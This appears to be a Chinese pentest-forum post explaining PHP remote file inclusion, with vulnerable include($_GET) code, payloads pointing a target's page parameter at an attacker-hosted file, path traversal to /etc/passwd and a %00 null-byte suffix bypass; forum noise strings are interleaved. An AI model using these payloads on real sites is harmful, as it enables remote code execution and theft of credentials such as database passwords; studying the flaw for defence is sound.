中国网络渗透测试联盟
标题:
PHP远程包含
[打印本页]
作者:
admin
时间:
2012-9-15 14:06
标题:
PHP远程包含
" }% | E' P( J- M& q
php远端档包含漏洞基本
; r J5 u% h6 y) R5 F: _
这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。
1 N: f' _# F; f/ P9 l$ z1 s
本帖隐藏的内容需要回复才可以浏览
+ B. _1 k0 ~' O# y8 |: ~
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
% j- a" h, W3 _5 Q8 Q4 T
1.找出bug:
8 C% j Y" J' K# p$ o7 s
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:
5 F6 m1 `* h7 Q4 c* W$ b. z/ z
如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
5 g0 m- H2 N! h. X
我们先看这个,当用户输入通过后就包含档,也就是
4 ?5 [1 W1 w$ y: n, Z2 L7 X
if ($_GET) {
/ y. n% M1 c! S* {% I5 B- J
include $_GET;
5 t5 T" u0 E9 a% Z$ q/ n; V6 p
} else {
8 t' C, `. J5 r0 ^# y7 B: K
include "home.php";
R* `0 H# E2 k2 E& h# a4 r" F
}
" _; D& X) b3 m7 V9 F5 G
这种结构在动态网站里是常见的,问题是它允许这样
http://www.target.com
/explame.php?page=main.php或者
http://www.target.com/explame.php?
page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
2 ~; y6 T4 Q7 p) l
2.测试
' R7 b! z+ X0 g( [- R
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的
2 J N; m9 K% {% S# q8 L
http://www.target.com/explame.php?page=zizzy
) L8 z K$ X7 ^, {! ]5 p' r: A
Warning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 3
1 o! @( x0 d& |9 u" U7 y/ e
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3
6 `0 c/ U# K( u: P
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。
' G+ |. C2 V( S8 ~* V1 Y# n x
3.利用
* v3 g) @2 f3 v
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上
http://www.mysite.com/yeah.txt.
内容这样
: E+ U5 T+ h! Y3 ]) g: _$ x
<?
% O& U8 c* K: X% R
echo "Wow,test!";
u0 c* A; W5 Q' R0 k
?>
* i3 B/ l$ n( O ]8 t( N _
那么
http://www.target.com/explame.php?pa...e.com/yeah.txt
% e4 S3 S. h! e& b9 ^* e
OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
( d! U( L7 n/ N! J" F+ b5 }) [5 m, }
4.另一种
+ }, _' Y9 _1 e# m2 T: M1 f
有时程式师换种写法,写成这样,限制了包含范围
; }9 `2 {6 O+ _# q) j/ J
if ($_GET) {
- F: J" K. g+ T0 G
include "$_GET.php";
0 f- _& I/ `) i
} else {
( \3 s( i/ ?# y; E2 V# `. H8 h& n
include "home.php";
5 A+ O' Z G8 T- q7 O' G$ C
}
" F9 @5 r: ~* X0 a. W; {
我们提交
http://www.target.com/explame.php?pa...e.com/yeah.txt
# D5 C( D6 u2 a% G# Q I* {, ^& @
Warning: main(
http://www.mysite.com/yeah.txt.php
): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3
0 ]; [8 Q% J1 X: u6 @& T
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
$ z8 y3 w! d E; f
包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了
' k3 `+ Y5 A0 ?3 D# x- X
那passwd怎么办
" h6 @! P" O7 L5 X3 z; s- O; x
Warning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
; L1 v$ e P z: d
Warning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
2 y0 }2 c" R1 r
在这里使用个NUL字元,也就是%00来跳过检测
& c; v8 \& P$ f! j" [5 |! t
http://www.target.com/explame.php?pa.../etc/passwd%00
3 E0 q5 Z4 A6 ]( J# l9 S
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2